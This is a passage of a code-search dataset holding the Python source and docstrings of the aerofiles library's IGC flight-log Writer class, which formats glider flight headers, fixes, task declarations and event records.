This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written. | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L348-L438 | [
"def write_pilot(self, pilot):\n \"\"\"\n Write the pilot declaration header::\n\n writer.write_pilot('Tobias Bieniek')\n # -> HFPLTPILOTINCHARGE:Tobias Bieniek\n\n :param pilot: name of the pilot\n \"\"\"\n self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')\n",
"def wri... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
    """Normalize *date* to the six-digit ``DDMMYY`` IGC representation.

    Accepts :class:`datetime.datetime`, :class:`datetime.date` or an
    already-formatted string; raises :class:`ValueError` for anything
    that does not match the expected pattern.
    """
    result = date
    if isinstance(result, datetime.datetime):
        result = result.date()
    if isinstance(result, datetime.date):
        result = result.strftime('%d%m%y')
    if patterns.DATE.match(result):
        return result
    raise ValueError("Invalid date: " + result)
def format_time(self, time):
    """Normalize *time* to the six-digit ``HHMMSS`` IGC representation.

    Accepts :class:`datetime.datetime`, :class:`datetime.time` or an
    already-formatted string; raises :class:`ValueError` for anything
    that does not match the expected pattern.
    """
    result = time
    if isinstance(result, datetime.datetime):
        result = result.time()
    if isinstance(result, datetime.time):
        result = result.strftime('%H%M%S')
    if patterns.TIME.match(result):
        return result
    raise ValueError("Invalid time: " + result)
def format_coordinate(self, value, default=None, is_latitude=True):
    """
    Format an angle in degrees as an IGC coordinate string.

    Latitudes become ``DDMMMMM[NS]``, longitudes ``DDDMMMMM[EW]``; the
    minutes are encoded with three decimal places ("milliminutes").

    :param value: the angle in degrees, or ``None``
    :param default: the string returned when ``value`` is ``None``
    :param is_latitude: ``True`` for latitudes (valid range -90..90),
        ``False`` for longitudes (valid range -180..180)
    :raises ValueError: if ``value`` is outside the valid range
    """
    if value is None:
        return default

    if is_latitude:
        if not -90 <= value <= 90:
            raise ValueError('Invalid latitude: %s' % value)
        hemisphere = 'S' if value < 0 else 'N'
        fmt = '%02d%05d%s'
    else:
        if not -180 <= value <= 180:
            raise ValueError('Invalid longitude: %s' % value)
        hemisphere = 'W' if value < 0 else 'E'
        fmt = '%03d%05d%s'

    value = abs(value)
    degrees = int(value)
    milliminutes = round((value - degrees) * 60000)

    # Rounding may push the minutes up to a full degree (e.g. for
    # 50.9999999 degrees): carry the overflow into the degrees field
    # instead of emitting the invalid minutes value "60000".
    if milliminutes >= 60000:
        degrees += 1
        milliminutes -= 60000

    return fmt % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
    """
    Write the date header::

        writer.write_date(datetime.date(2014, 5, 2))
        # -> HFDTE140502

    :param date: a :class:`datetime.date` instance
    """
    formatted = self.format_date(date)
    self.write_fr_header('DTE', formatted)
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_task_metadata | python | def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record) | Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 2),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L484-L550 | null | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
